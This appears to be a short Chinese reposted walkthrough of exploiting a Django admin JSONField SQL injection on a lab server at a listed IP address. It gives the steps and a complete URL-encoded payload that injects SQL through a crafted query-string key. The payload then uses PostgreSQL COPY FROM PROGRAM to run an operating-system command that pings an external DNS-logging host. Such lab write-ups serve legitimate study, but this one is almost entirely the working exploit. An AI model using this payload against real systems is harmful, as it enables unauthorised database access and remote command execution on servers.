1.访问http://110.40.154.100:8000,可以看到Django
的默认页面
2.访问http://110.40.154.100:8000/admin
进入登录界面 输入账号密码进行登录
3.进入Collection
的管理页面http://
110.40.154.100:8000/admin/vuln/collection/
4.GET参数中构造detail__a'b=123
提交,其中detail
是模型Collection
中的JSONField:http://110.40.154.100:8000/admin/vuln/collection/?detail__a%27b=123
5.然后执行命令http://110.40.154.100:8000/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcopy%20cmd_exec%20FROM%20PROGRAM%20%27ping%208e5p35.dnslog.cn%27--%20
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)